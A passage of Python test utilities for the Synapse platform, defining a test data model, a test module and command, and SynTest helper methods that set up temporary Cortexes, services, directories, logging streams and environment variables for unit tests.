def _normPyStr(self, valu):
return valu.lower(), {}
class ThreeType(s_types.Type):
stortype = s_layer.STOR_TYPE_U8
def norm(self, valu):
return 3, {'subs': {'three': 3}}
def repr(self, valu):
return '3'
class TestSubType(s_types.Type):
stortype = s_layer.STOR_TYPE_U32
def norm(self, valu):
valu = int(valu)
return valu, {'subs': {'isbig': valu >= 1000}}
def repr(self, norm):
return str(norm)
class TestRunt:
def __init__(self, name, **kwargs):
self.name = name
self.props = kwargs
self.props.setdefault('.created', s_common.now())
def getStorNode(self, form):
ndef = (form.name, form.type.norm(self.name)[0])
buid = s_common.buid(ndef)
pnorms = {}
for prop, valu in self.props.items():
formprop = form.props.get(prop)
if formprop is not None and valu is not None:
pnorms[prop] = formprop.type.norm(valu)[0]
return (buid, {
'ndef': ndef,
'props': pnorms,
})
testmodel = {
'ctors': (
('test:sub', 'synapse.tests.utils.TestSubType', {}, {}),
('test:type', 'synapse.tests.utils.TestType', {}, {}),
('test:threetype', 'synapse.tests.utils.ThreeType', {}, {}),
),
'types': (
('test:type10', ('test:type', {'foo': 10}), {
'doc': 'A fake type.'}),
('test:lower', ('str', {'lower': True}), {}),
('test:time', ('time', {}), {}),
('test:ival', ('ival', {}), {}),
('test:int', ('int', {}), {}),
('test:float', ('float', {}), {}),
('test:str', ('str', {}), {}),
('test:migr', ('str', {}), {}),
('test:auto', ('str', {}), {}),
('test:edge', ('edge', {}), {}),
('test:guid', ('guid', {}), {}),
('test:arrayprop', ('guid', {}), {}),
('test:comp', ('comp', {'fields': (
('hehe', 'test:int'),
('haha', 'test:lower'))
}), {'doc': 'A fake comp type.'}),
('test:complexcomp', ('comp', {'fields': (
('foo', 'test:int'),
('bar', ('str', {'lower': True}),),
)}), {'doc': 'A complex comp type.'}),
('test:hexa', ('hex', {}), {'doc': 'anysize test hex type'}),
('test:hex4', ('hex', {'size': 4}), {'doc': 'size 4 test hex type'}),
('test:pivtarg', ('str', {}), {}),
('test:pivcomp', ('comp', {'fields': (('targ', 'test:pivtarg'), ('lulz', 'test:str'))}), {}),
('test:haspivcomp', ('int', {}), {}),
('test:cycle0', ('str', {}), {}),
('test:cycle1', ('str', {}), {}),
('test:ndef', ('ndef', {}), {}),
('test:runt', ('str', {'lower': True, 'strip': True}), {'doc': 'A Test runt node'}),
),
'univs': (
('test:univ', ('int', {'min': -1, 'max': 10}), {'doc': 'A test universal property.'}),
('univarray', ('array', {'type': 'int'}), {'doc': 'A test array universal property.'}),
),
'forms': (
('test:arrayprop', {}, (
('ints', ('array', {'type': 'test:int'}), {}),
)),
('test:type10', {}, (
('intprop', ('int', {'min': 20, 'max': 30}), {}),
('int2', ('int', {}), {}),
('strprop', ('str', {'lower': 1}), {}),
('guidprop', ('guid', {'lower': 1}), {}),
('locprop', ('loc', {}), {}),
)),
('test:cycle0', {}, (
('cycle1', ('test:cycle1', {}), {}),
)),
('test:cycle1', {}, (
('cycle0', ('test:cycle0', {}), {}),
)),
('test:type', {}, ()),
('test:comp', {}, (
('hehe', ('test:int', {}), {'ro': 1}),
('haha', ('test:lower', {}), {'ro': 1}),
)),
('test:complexcomp', {}, (
('foo', ('test:int', {}), {'ro': 1}),
('bar', ('str', {'lower': 1}), {'ro': 1})
)),
('test:int', {}, (
('loc', ('loc', {}), {}),
('int2', ('int', {}), {}),
)),
('test:float', {}, (
('closed', ('float', {'min': 0.0, 'max': 360.0}), {}),
('open', ('float', {'min': 0.0, 'max': 360.0, 'minisvalid': False, 'maxisvalid': False}), {}),
)),
('test:edge', {}, (
('n1', ('ndef', {}), {'ro': 1}),
('n1:form', ('str', {}), {'ro': 1}),
('n2', ('ndef', {}), {'ro': 1}),
('n2:form', ('str', {}), {'ro': 1}),
)),
('test:guid', {}, (
('size', ('test:int', {}), {}),
('tick', ('test:time', {}), {}),
('posneg', ('test:sub', {}), {}),
('posneg:isbig', ('bool', {}), {}),
)),
('test:str', {}, (
('bar', ('ndef', {}), {}),
('baz', ('nodeprop', {}), {}),
('tick', ('test:time', {}), {}),
('hehe', ('str', {}), {}),
)),
('test:migr', {}, (
('bar', ('ndef', {}), {}),
('baz', ('nodeprop', {}), {}),
('tick', ('test:time', {}), {}),
)),
('test:threetype', {}, (
('three', ('int', {}), {}),
)),
('test:auto', {}, ()),
('test:hexa', {}, ()),
('test:hex4', {}, ()),
('test:ival', {}, (
('interval', ('ival', {}), {}),
)),
('test:pivtarg', {}, (
('name', ('str', {}), {}),
)),
('test:pivcomp', {}, (
('targ', ('test:pivtarg', {}), {}),
('lulz', ('test:str', {}), {}),
('tick', ('time', {}), {}),
('size', ('test:int', {}), {}),
('width', ('test:int', {}), {}),
)),
('test:haspivcomp', {}, (
('have', ('test:pivcomp', {}), {}),
)),
('test:ndef', {}, (
('form', ('str', {}), {'ro': 1}),
)),
('test:runt', {'runt': True}, (
('tick', ('time', {}), {'ro': True}),
('lulz', ('str', {}), {}),
('newp', ('str', {}), {'doc': 'A stray property we never use in nodes.'}),
)),
),
}
class TestCmd(s_storm.Cmd):
'''
A test command
'''
name = 'testcmd'
forms = {
'input': [
'test:str',
'inet:ipv6',
],
'output': [
'inet:fqdn',
],
'nodedata': [
('foo', 'inet:ipv4'),
('bar', 'inet:fqdn'),
],
}
def getArgParser(self):
pars = s_storm.Cmd.getArgParser(self)
return pars
async def execStormCmd(self, runt, genr):
async for node, path in genr:
await runt.printf(f'{self.name}: {node.ndef}')
yield node, path
class TestModule(s_module.CoreModule):
testguid = '8f1401de15918358d5247e21ca29a814'
async def initCoreModule(self):
self.core.setFeedFunc('com.test.record', self.addTestRecords)
async with await self.core.snap() as snap:
node = await snap.getNodeByNdef(('meta:source', self.testguid))
if node is None:
await snap.addNode('meta:source', self.testguid, {'name': 'test'})
self.core.addStormLib(('test',), LibTst)
self.healthy = True
self.core.addHealthFunc(self._testModHealth)
form = self.model.form('test:runt')
self.core.addRuntLift(form.full, self._testRuntLift)
for prop in form.props.values():
self.core.addRuntLift(prop.full, self._testRuntLift)
self.core.addRuntPropSet('test:runt:lulz', self._testRuntPropSetLulz)
self.core.addRuntPropDel('test:runt:lulz', self._testRuntPropDelLulz)
async def _testModHealth(self, health):
if self.healthy:
health.update(self.getModName(), 'nominal',
'Test module is healthy', data={'beep': 0})
else:
health.update(self.getModName(), 'failed',
'Test module is unhealthy', data={'beep': 1})
async def addTestRecords(self, snap, items):
for name in items:
await snap.addNode('test:str', name)
async def _testRuntLift(self, full, valu=None, cmpr=None):
now = s_common.now()
modl = self.core.model
runtdefs = [
(' BEEP ', {'tick': modl.type('time').norm('2001')[0], 'lulz': 'beep.sys', '.created': now}),
('boop', {'tick': modl.type('time').norm('2010')[0], '.created': now}),
('blah', {'tick': modl.type('time').norm('2010')[0], 'lulz': 'blah.sys'}),
('woah', {}),
]
runts = {}
for name, props in runtdefs:
runts[name] = TestRunt(name, **props)
genr = runts.values
async for node in self._doRuntLift(genr, full, valu, cmpr):
yield node
async def _doRuntLift(self, genr, full, valu=None, cmpr=None):
if cmpr is not None:
filt = self.model.prop(full).type.getCmprCtor(cmpr)(valu)
if filt is None:
raise s_exc.BadCmprValu(cmpr=cmpr)
fullprop = self.model.prop(full)
if fullprop.isform:
if cmpr is None:
for obj in genr():
yield obj.getStorNode(fullprop)
return
for obj in genr():
sode = obj.getStorNode(fullprop)
if filt(sode[1]['ndef'][1]):
yield sode
else:
for obj in genr():
sode = obj.getStorNode(fullprop.form)
propval = sode[1]['props'].get(fullprop.name)
if propval is not None and (cmpr is None or filt(propval)):
yield sode
async def _testRuntPropSetLulz(self, node, prop, valu):
curv = node.get(prop.name)
valu, _ = prop.type.norm(valu)
if curv == valu:
return False
if not valu.endswith('.sys'):
raise s_exc.BadTypeValu(mesg='test:runt:lulz must end with ".sys"',
valu=valu, name=prop.full)
node.props[prop.name] = valu
# In this test helper, we do NOT persist the change to our in-memory
# storage of row data, so a re-lift of the node would not reflect the
# change that a user made here.
return True
async def _testRuntPropDelLulz(self, node, prop,):
curv = node.props.pop(prop.name, s_common.novalu)
if curv is s_common.novalu:
return False
# In this test helper, we do NOT persist the change to our in-memory
# storage of row data, so a re-lift of the node would not reflect the
# change that a user made here.
return True
def getModelDefs(self):
return (
('test', testmodel),
)
def getStormCmds(self):
return (TestCmd,
)
class TstEnv:
def __init__(self):
self.items = {}
self.tofini = []
def __getattr__(self, prop):
item = self.items.get(prop)
if item is None:
raise AttributeError(prop)
return item
async def __aenter__(self):
return self
async def __aexit__(self, cls, exc, tb):
await self.fini()
def add(self, name, item, fini=False):
self.items[name] = item
if fini:
self.tofini.append(item)
async def fini(self):
for base in self.tofini:
await base.fini()
class TstOutPut(s_output.OutPutStr):
def expect(self, substr, throw=True):
'''
Check if a string is present in the messages captured by the OutPutStr object.
Args:
substr (str): String to check for the existence of.
throw (bool): If True, a missing substr results in a Exception being thrown.
Returns:
bool: True if the string is present; False if the string is not present and throw is False.
'''
outs = str(self)
if outs.find(substr) == -1:
if throw:
mesg = 'TestOutPut.expect(%s) not in %s' % (substr, outs)
raise s_exc.SynErr(mesg=mesg)
return False
return True
def clear(self):
self.mesgs.clear()
class CmdGenerator:
def __init__(self, cmds):
self.cmds = collections.deque(cmds)
def addCmd(self, cmd):
'''
Add a command to the end of the list of commands returned by the CmdGenerator.
Args:
cmd (str): Command to add to the list of commands to return.
'''
self.cmds.append(cmd)
def __call__(self, *args, **kwargs):
return self._corocall(*args, **kwargs)
async def _corocall(self, *args, **kwargs):
if not self.cmds:
raise Exception('No further actions.')
retn = self.cmds.popleft()
if isinstance(retn, (Exception, KeyboardInterrupt)):
raise retn
return retn
class StreamEvent(io.StringIO, threading.Event):
'''
A combination of a io.StringIO object and a threading.Event object.
'''
def __init__(self, *args, **kwargs):
io.StringIO.__init__(self, *args, **kwargs)
threading.Event.__init__(self)
self.mesg = ''
def setMesg(self, mesg):
'''
Clear the internal event and set a new message that is used to set the event.
Args:
mesg (str): The string to monitor for.
Returns:
None
'''
self.mesg = mesg
self.clear()
def write(self, s):
io.StringIO.write(self, s)
if self.mesg and self.mesg in s:
self.set()
class AsyncStreamEvent(io.StringIO, asyncio.Event):
'''
A combination of a io.StringIO object and an asyncio.Event object.
'''
def __init__(self, *args, **kwargs):
io.StringIO.__init__(self, *args, **kwargs)
asyncio.Event.__init__(self, loop=asyncio.get_running_loop())
self.mesg = ''
def setMesg(self, mesg):
'''
Clear the internal event and set a new message that is used to set the event.
Args:
mesg (str): The string to monitor for.
Returns:
None
'''
self.mesg = mesg
self.clear()
def write(self, s):
io.StringIO.write(self, s)
if self.mesg and self.mesg in s:
self.set()
async def wait(self, timeout=None):
if timeout is None:
return await asyncio.Event.wait(self)
return await s_coro.event_wait(self, timeout=timeout)
class HttpReflector(s_httpapi.Handler):
'''Test handler which reflects get/post data back to the caller'''
async def get(self):
resp = {}
if self.request.arguments:
d = collections.defaultdict(list)
resp['params'] = d
for k, items in self.request.arguments.items():
for v in items:
d[k].append(v.decode())
resp['headers'] = dict(self.request.headers)
resp['path'] = self.request.path
self.sendRestRetn(resp)
async def post(self):
resp = {}
if self.request.arguments:
d = collections.defaultdict(list)
resp['params'] = d
for k, items in self.request.arguments.items():
for v in items:
d[k].append(v.decode())
resp['headers'] = dict(self.request.headers)
resp['path'] = self.request.path
if self.request.body:
resp['body'] = s_common.enbase64(self.request.body)
self.sendRestRetn(resp)
s_task.vardefault('applynest', lambda: None)
async def _doubleapply(self, indx, item):
'''
Just like NexusRoot._apply, but calls the function twice. Patched in when global variable SYNDEV_NEXUS_REPLAY
is set.
'''
try:
nestitem = s_task.varget('applynest')
assert nestitem is None, f'Failure: have nested nexus actions, inner item is {item}, outer item was {nestitem}'
s_task.varset('applynest', item)
nexsiden, event, args, kwargs, _ = item
nexus = self._nexskids[nexsiden]
func, passitem = nexus._nexshands[event]
if passitem:
retn = await func(nexus, *args, nexsitem=(indx, item), **kwargs)
await func(nexus, *args, nexsitem=(indx, item), **kwargs)
return retn
retn = await func(nexus, *args, **kwargs)
await func(nexus, *args, **kwargs)
return retn
finally:
s_task.varset('applynest', None)
class SynTest(unittest.TestCase):
'''
Mark all async test methods as s_glob.synchelp decorated.
Note:
This precludes running a single unit test via path using the unittest module.
'''
def __init__(self, *args, **kwargs):
unittest.TestCase.__init__(self, *args, **kwargs)
self._NextBuid = 0
self._NextGuid = 0
for s in dir(self):
attr = getattr(self, s, None)
# If s is an instance method and starts with 'test_', synchelp wrap it
if inspect.iscoroutinefunction(attr) and s.startswith('test_') and inspect.ismethod(attr):
setattr(self, s, s_glob.synchelp(attr))
def checkNode(self, node, expected):
ex_ndef, ex_props = expected
self.eq(node.ndef, ex_ndef)
[self.eq(node.get(k), v, msg=f'Prop {k} does not match') for (k, v) in ex_props.items()]
diff = {prop for prop in (set(node.props) - set(ex_props)) if not prop.startswith('.')}
if diff:
logger.warning('form(%s): untested properties: %s', node.form.name, diff)
def worker(func, *args, **kwargs):
'''
Fire a worker thread to run the given func(*args,**kwargs)
'''
def work():
return func(*args, **kwargs)
thr = threading.Thread(target=work)
thr.start()
return thr
def printed(self, msgs, text):
# a helper for testing storm print message output
for mesg in msgs:
if mesg[0] == 'print':
if mesg[1].get('mesg') == text:
return
raise Exception('print output not found: %r' % (text,))
def skip(self, mesg):
raise unittest.SkipTest(mesg)
@contextlib.contextmanager
def getRegrDir(self, *path):
regr = os.getenv('SYN_REGRESSION_REPO')
if regr is None: # pragma: no cover
raise unittest.SkipTest('SYN_REGRESSION_REPO is not set')
regr = s_common.genpath(regr)
if not os.path.isdir(regr): # pragma: no cover
raise Exception('SYN_REGRESSION_REPO is not a dir')
dirn = os.path.join(regr, *path)
with self.getTestDir(copyfrom=dirn) as regrdir:
yield regrdir
@contextlib.asynccontextmanager
async def getRegrCore(self, vers):
with self.getRegrDir('cortexes', vers) as dirn:
async with await s_cortex.Cortex.anit(dirn) as core:
yield core
def skipIfNoInternet(self): # pragma: no cover
'''
Allow skipping a test if SYN_TEST_SKIP_INTERNET envar is set.
Raises:
unittest.SkipTest if SYN_TEST_SKIP_INTERNET envar is set to a integer greater than 1.
'''
if bool(int(os.getenv('SYN_TEST_SKIP_INTERNET', 0))):
raise unittest.SkipTest('SYN_TEST_SKIP_INTERNET envar set')
def skipLongTest(self): # pragma: no cover
'''
Allow skipping a test if SYN_TEST_SKIP_LONG envar is set.
Raises:
unittest.SkipTest if SYN_TEST_SKIP_LONG envar is set to a integer greater than 1.
'''
if bool(int(os.getenv('SYN_TEST_SKIP_LONG', 0))):
raise unittest.SkipTest('SYN_TEST_SKIP_LONG envar set')
def getTestOutp(self):
'''
Get a Output instance with a expects() function.
Returns:
TstOutPut: A TstOutPut instance.
'''
return TstOutPut()
def thisHostMust(self, **props): # pragma: no cover
'''
Requires a host having a specific property.
Args:
**props:
Raises:
unittest.SkipTest if the required property is missing.
'''
for k, v in props.items():
if s_thishost.get(k) != v:
raise unittest.SkipTest('skip thishost: %s!=%r' % (k, v))
def thisHostMustNot(self, **props): # pragma: no cover
'''
Requires a host to not have a specific property.
Args:
**props:
Raises:
unittest.SkipTest if the required property is missing.
'''
for k, v in props.items():
if s_thishost.get(k) == v:
raise unittest.SkipTest('skip thishost: %s==%r' % (k, v))
@contextlib.asynccontextmanager
async def getTestAxon(self, dirn=None):
'''
Get a test Axon as an async context manager.
Returns:
s_axon.Axon: A Axon object.
'''
if dirn is not None:
async with await s_axon.Axon.anit(dirn) as axon:
yield axon
return
with self.getTestDir() as dirn:
async with await s_axon.Axon.anit(dirn) as axon:
yield axon
@contextlib.contextmanager
def withTestCmdr(self, cmdg):
getItemCmdr = s_cmdr.getItemCmdr
async def getTestCmdr(*a, **k):
cli = await getItemCmdr(*a, **k)
cli.prompt = cmdg
return cli
with mock.patch('synapse.lib.cmdr.getItemCmdr', getTestCmdr):
yield
@contextlib.contextmanager
def withCliPromptMockExtendOutp(self, outp):
'''
Context manager to mock our use of Prompt Toolkit's print_formatted_text function and
extend the lines to an an output object.
Args:
outp (TstOutPut): The outp to extend.
Notes:
This extends the outp with the lines AFTER the context manager has exited.
Returns:
mock.MagicMock: Yields a mock.MagicMock object.
'''
with self.withCliPromptMock() as patch:
yield patch
self.extendOutpFromPatch(outp, patch)
@contextlib.contextmanager
def withCliPromptMock(self):
'''
Context manager to mock our use of Prompt Toolkit's print_formatted_text function.
Returns:
mock.MagicMock: Yields a mock.MagikMock object.
'''
with mock.patch('synapse.lib.cli.print_formatted_text',
mock.MagicMock(return_value=None)) as patch: # type: mock.MagicMock
yield patch
@contextlib.contextmanager
def withSetLoggingMock(self):
'''
Context manager to mock calls to the setlogging function to avoid unittests calling logging.basicconfig.
Returns:
mock.MagicMock: Yields a mock.MagikMock object.
'''
with mock.patch('synapse.common.setlogging',
mock.MagicMock(return_value=None)) as patch: # type: mock.MagicMock
yield patch
def getMagicPromptLines(self, patch):
'''
Get the text lines from a MagicMock object from withCliPromptMock.
Args:
patch (mock.MagicMock): The MagicMock object from withCliPromptMock.
Returns:
list: A list of lines.
'''
self.true(patch.called, 'Assert prompt was called')
lines = []
for args in patch.call_args_list:
arg = args[0][0]
if isinstance(arg, str):
lines.append(arg)
continue
if isinstance(arg, FormattedText):
color, text = arg[0]
lines.append(text)
continue
raise ValueError(f'Unknown arg: {type(arg)}/{arg}')
return lines
def getMagicPromptColors(self, patch):
'''
Get the colored lines from a MagicMock object from withCliPromptMock.
Args:
patch (mock.MagicMock): The MagicMock object from withCliPromptMock.
Returns:
list: A list of tuples, containing color and line data.
'''
self.true(patch.called, 'Assert prompt was called')
lines = []
for args in patch.call_args_list:
arg = args[0][0]
if isinstance(arg, str):
continue
if isinstance(arg, FormattedText):
color, text = arg[0]
lines.append((color, text))
continue
raise ValueError(f'Unknown arg: {type(arg)}/{arg}')
return lines
def extendOutpFromPatch(self, outp, patch):
'''
Extend an Outp with lines from a magicMock object from withCliPromptMock.
Args:
outp (TstOutPut): The outp to extend.
patch (mock.MagicMock): The patch object.
Returns:
None: Returns none.
'''
lines = self.getMagicPromptLines(patch)
[outp.printf(line) for line in lines]
@contextlib.asynccontextmanager
async def getTestReadWriteCores(self, conf=None, dirn=None):
'''
Get a read/write core pair.
Notes:
By default, this returns the same cortex. It is expected that
a test which needs two distinct Cortexes implements the bridge
themselves.
Returns:
(s_cortex.Cortex, s_cortex.Cortex): A tuple of Cortex objects.
'''
async with self.getTestCore(conf=conf, dirn=dirn) as core:
yield core, core
@contextlib.contextmanager
def withNexusReplay(self, replay=False):
'''
Patch so that the Nexus apply log is applied twice. Useful to verify idempotency.
Notes:
This is applied if the environment variable SYNDEV_NEXUS_REPLAY is set
or the replay argument is set to True.
Returns:
contextlib.ExitStack: An exitstack object.
'''
replay = os.environ.get('SYNDEV_NEXUS_REPLAY', default=replay)
with contextlib.ExitStack() as stack:
if replay:
stack.enter_context(mock.patch.object(s_nexus.NexsRoot, '_apply', _doubleapply))
yield stack
@contextlib.asynccontextmanager
async def getTestCore(self, conf=None, dirn=None):
'''
Get a simple test Cortex as an async context manager.
Returns:
s_cortex.Cortex: A Cortex object.
'''
if conf is None:
conf = {'layer:lmdb:map_async': True,
'provenance:en': True,
'nexslog:en': True,
'layers:logedits': True,
}
conf = copy.deepcopy(conf)
mods = conf.get('modules')
if mods is None:
mods = []
conf['modules'] = mods
mods.append(('synapse.tests.utils.TestModule', {'key': 'valu'}))
with self.withNexusReplay():
if dirn is not None:
async with await s_cortex.Cortex.anit(dirn, conf=conf) as core:
yield core
return
with self.getTestDir() as dirn:
async with await s_cortex.Cortex.anit(dirn, conf=conf) as core:
yield core
@contextlib.asynccontextmanager
async def getTestCoreAndProxy(self, conf=None, dirn=None):
'''
Get a test Cortex and the Telepath Proxy to it.
Returns:
(s_cortex.Cortex, s_cortex.CoreApi): The Cortex and a Proxy representing a CoreApi object.
'''
async with self.getTestCore(conf=conf, dirn=dirn) as core:
core.conf['storm:log'] = True
async with core.getLocalProxy() as prox:
yield core, prox
@contextlib.asynccontextmanager
async def getTestCryo(self, dirn=None):
'''
Get a simple test Cryocell as an async context manager.
Returns:
s_cryotank.CryoCell: Test cryocell.
'''
if dirn is not None:
async with await s_cryotank.CryoCell.anit(dirn) as cryo:
yield cryo
return
with self.getTestDir() as dirn:
async with await s_cryotank.CryoCell.anit(dirn) as cryo:
yield cryo
@contextlib.asynccontextmanager
async def getTestCryoAndProxy(self, dirn=None):
'''
Get a test Cryocell and the Telepath Proxy to it.
Returns:
(s_cryotank: CryoCell, s_cryotank.CryoApi): The CryoCell and a Proxy representing a CryoApi object.
'''
async with self.getTestCryo(dirn=dirn) as cryo:
async with cryo.getLocalProxy() as prox:
yield cryo, prox
@contextlib.asynccontextmanager
async def getTestDmon(self):
with self.getTestDir(mirror='certdir') as certdir:
async with await s_daemon.Daemon.anit(certdir=certdir) as dmon:
await dmon.listen('tcp://127.0.0.1:0/')
with mock.patch('synapse.lib.certdir.defdir', certdir):
yield dmon
@contextlib.asynccontextmanager
async def getTestCell(self, ctor, conf=None, dirn=None):
'''
Get a test Cell.
'''
if conf is None:
conf = {}
conf = copy.deepcopy(conf)
if dirn is not None:
async with await ctor.anit(dirn, conf=conf) as cell:
yield cell
return
with self.getTestDir() as dirn:
async with await ctor.anit(dirn, conf=conf) as cell:
yield cell
@contextlib.asynccontextmanager
async def getTestCoreProxSvc(self, ssvc, ssvc_conf=None, core_conf=None):
'''
Get a test Cortex, the Telepath Proxy to it, and a test service instance.
Args:
ssvc: Ctor to the Test Service.
ssvc_conf: Service configuration.
core_conf: Cortex configuration.
Returns:
(s_cortex.Cortex, s_cortex.CoreApi, testsvc): The Cortex, Proxy, and service instance.
'''
async with self.getTestCoreAndProxy(core_conf) as (core, prox):
async with self.getTestCell(ssvc, ssvc_conf) as testsvc:
await self.addSvcToCore(testsvc, core)
yield core, prox, testsvc
async def addSvcToCore(self, svc, core, svcname='svc'):
'''
Add a service to a Cortex using telepath over tcp.
'''
svc.dmon.share('svc', svc)
root = await svc.auth.getUserByName('root')
await root.setPasswd('root')
info = await svc.dmon.listen('tcp://127.0.0.1:0/')
svc.dmon.test_addr = info
host, port = info
surl = f'tcp://root:root@127.0.0.1:{port}/svc'
await self.runCoreNodes(core, f'service.add {svcname} {surl}')
await self.runCoreNodes(core, f'$lib.service.wait({svcname})')
def getTestUrl(self, dmon, name, **opts):
host, port = dmon.addr
netloc = '%s:%s' % (host, port)
user = opts.get('user')
passwd = opts.get('passwd')
if user is not None and passwd is not None:
netloc = '%s:%s@%s' % (user, passwd, netloc)
return 'tcp://%s/%s' % (netloc, name)
def getTestProxy(self, dmon, name, **kwargs):
host, port = dmon.addr
kwargs.update({'host': host, 'port': port})
return s_telepath.openurl(f'tcp:///{name}', **kwargs)
@contextlib.contextmanager
def getTestDir(self, mirror=None, copyfrom=None, chdir=False, startdir=None):
'''
Get a temporary directory for test purposes.
This destroys the directory afterwards.
Args:
mirror (str): A directory to mirror into the test directory.
startdir (str): The directory under which to place the temporary kdirectory
Notes:
The mirror argument is normally used to mirror test directory
under ``synapse/tests/files``. This is accomplised by passing in
the name of the directory (such as ``testcore``) as the mirror
argument.
If the ``mirror`` argument is an absolute directory, that directory
will be copied to the test directory.
Returns:
str: The path to a temporary directory.
'''
curd = os.getcwd()
tempdir = tempfile.mkdtemp(dir=startdir)
try:
dstpath = tempdir
if mirror is not None:
srcpath = self.getTestFilePath(mirror)
dstpath = os.path.join(dstpath, 'mirror')
shutil.copytree(srcpath, dstpath)
elif copyfrom is not None:
dstpath = os.path.join(dstpath, 'mirror')
shutil.copytree(copyfrom, dstpath)
if chdir:
os.chdir(dstpath)
yield dstpath
finally:
if chdir:
os.chdir(curd)
shutil.rmtree(tempdir, ignore_errors=True)
def getTestFilePath(self, *names):
import synapse.tests.__init__
path = os.path.dirname(synapse.tests.__init__.__file__)
return os.path.join(path, 'files', *names)
@contextlib.contextmanager
def getLoggerStream(self, logname, mesg=''):
'''
Get a logger and attach a io.StringIO object to the logger to capture log messages.
Args:
logname (str): Name of the logger to get.
mesg (str): A string which, if provided, sets the StreamEvent event if a message
containing the string is written to the log.
Examples:
Do an action and get the stream of log messages to check against::
with self.getLoggerStream('synapse.foo.bar') as stream:
# Do something that triggers a log message
doSomething()
stream.seek(0)
mesgs = stream.read()
# Do something with messages
Do an action and wait for a specific log message to be written::
with self.getLoggerStream('synapse.foo.bar', 'big badda boom happened') as stream:
# Do something that triggers a log message
doSomething()
stream.wait(timeout=10) # Wait for the mesg to be written to the stream
stream.seek(0)
mesgs = stream.read()
# Do something with messages
You can also reset the message and wait for another message to occur::
with self.getLoggerStream('synapse.foo.bar', 'big badda boom happened') as stream:
# Do something that triggers a log message
doSomething()
stream.wait(timeout=10)
stream.setMesg('yo dawg') # This will now wait for the 'yo dawg' string to be written.
stream.wait(timeout=10)
stream.seek(0)
mesgs = stream.read()
# Do something with messages
Notes:
This **only** captures logs for the current process.
Yields:
StreamEvent: A StreamEvent object
'''
stream = StreamEvent()
stream.setMesg(mesg)
handler = logging.StreamHandler(stream)
slogger = logging.getLogger(logname)
slogger.addHandler(handler)
level = slogger.level
slogger.setLevel('DEBUG')
try:
yield stream
except Exception: # pragma: no cover
raise
finally:
slogger.removeHandler(handler)
slogger.setLevel(level)
@contextlib.contextmanager
def getAsyncLoggerStream(self, logname, mesg=''):
'''
Async version of getLoggerStream.
Args:
logname (str): Name of the logger to get.
mesg (str): A string which, if provided, sets the StreamEvent event if a message
containing the string is written to the log.
Notes:
The event object mixed in for the AsyncStreamEvent is a asyncio.Event object.
This requires the user to await the Event specific calls as neccesary.
Examples:
Do an action and wait for a specific log message to be written::
with self.getAsyncLoggerStream('synapse.foo.bar',
'big badda boom happened') as stream:
# Do something that triggers a log message
await doSomething()
# Wait for the mesg to be written to the stream
await stream.wait(timeout=10)
stream.seek(0)
mesgs = stream.read()
# Do something with messages
Returns:
AsyncStreamEvent: An AsyncStreamEvent object.
'''
stream = AsyncStreamEvent()
stream.setMesg(mesg)
handler = logging.StreamHandler(stream)
slogger = logging.getLogger(logname)
slogger.addHandler(handler)
level = slogger.level
slogger.setLevel('DEBUG')
try:
yield stream
except Exception: # pragma: no cover
raise
finally:
slogger.removeHandler(handler)
slogger.setLevel(level)
@contextlib.asynccontextmanager
async def getHttpSess(self, auth=None, port=None):
'''
Get an aiohttp ClientSession with a CookieJar.
Args:
auth (str, str): A tuple of username and password information for http auth.
port (int): Port number to connect to.
Notes:
If auth and port are provided, the session will login to a Synapse cell
hosted at localhost:port.
Returns:
aiohttp.ClientSession: An aiohttp.ClientSession object.
'''
jar = aiohttp.CookieJar(unsafe=True)
conn = aiohttp.TCPConnector(ssl=False)
async with aiohttp.ClientSession(cookie_jar=jar, connector=conn) as sess:
if auth is not None:
if port is None: # pragma: no cover
raise Exception('getHttpSess requires port for auth')
user, passwd = auth
async with sess.post(f'https://localhost:{port}/api/v1/login',
json={'user': user, 'passwd': passwd}) as resp:
retn = await resp.json()
self.eq('ok', retn.get('status'))
self.eq(user, retn['result']['name'])
yield sess
@contextlib.contextmanager
def setTstEnvars(self, **props):
'''
Set Environment variables for the purposes of running a specific test.
Args:
**props: A kwarg list of envars to set. The values set are run
through str() to ensure we're setting strings.
Examples:
Run a test while a envar is set::
with self.setEnvars(magic='haha') as nop:
ret = dostuff()
self.true(ret)
Notes:
This helper explicitly sets and unsets values in os.environ, as
os.putenv does not automatically updates the os.environ object.
Yields:
None. This context manager yields None. Upon exiting, envars are
either removed from os.environ or reset to their previous values.
'''
old_data = {}
pop_data = set()
for key, valu in props.items():
v = str(valu)
oldv = os.environ.get(key, None)
if oldv:
if oldv == v:
continue
else:
old_data[key] = oldv
os.environ[key] = v
else:
pop_data.add(key)
os.environ[key] = v
# This context manager is a nop
try:
yield None
except Exception: # pragma: no cover
raise
# Clean up any new envars we set and any old envars we need to reset.
finally:
for key in pop_data:
del os.environ[key]
for key, valu in old_data.items():
os.environ[key] = valu
async def execToolMain(self, func, argv):
outp = self.getTestOutp()
def execmain():
return func(argv, outp=outp)
retn = await s_coro.executor(execmain)
return retn, outp
@contextlib.contextmanager
def redirectStdin(self, new_stdin):
'''
Temporary replace stdin.
Args:
new_stdin(file-like object): file-like object.
Examples:
inp = io.StringIO('stdin stuff\nanother line\n')
with self.redirectStdin(inp):
main()
Here's a way to use this for code that's expecting the stdin buffer to have bytes.
inp = Mock()
inp.buffer = io.BytesIO(b'input data')
with self.redirectStdin(inp):
main()
Returns:
None
'''
old_stdin = sys.stdin
sys.stdin = new_stdin
yield
sys.stdin = old_stdin
def genraises(self, exc, gfunc, *args, **kwargs):
'''
Helper to validate that a generator function will throw an exception.
Args:
exc: Exception class to catch
gfunc: Generator function to call.
*args: Args passed to the generator function.
**kwargs: Kwargs passed to the generator function.
Notes:
Wrap a generator function in a list() call and execute that in a
bound local using ``self.raises(exc, boundlocal)``. The ``list()``
will consume the generator until complete or an exception occurs.
'''
def testfunc():
return list(gfunc(*args, **kwargs))
self.raises(exc, testfunc)
async def agenraises(self, exc, gfunc):
'''
Helper to validate that an async generator will throw an exception.
Args:
exc: Exception class to catch
gfunc: async Generator
'''
await self.asyncraises(exc, alist(gfunc))
@contextlib.contextmanager
def setSynDir(self, dirn):
'''
Sets s_common.syndir to a specific directory and then unsets it afterwards.
Args:
dirn (str): Directory to set syndir to.
Notes:
This is to be used as a context manager.
'''
olddir = s_common.syndir
try:
s_common.syndir = dirn
yield None
finally:
s_common.syndir = olddir
@contextlib.contextmanager
def getTestSynDir(self):
'''
Combines getTestDir() and setSynDir() into one.
'''
with self.getTestDir() as dirn:
with self.setSynDir(dirn):
yield dirn
def eq(self, x, y, msg=None):
'''
Assert X is equal to Y
'''
if type(x) == list:
x = tuple(x)
if type(y) == list:
y = tuple(y)
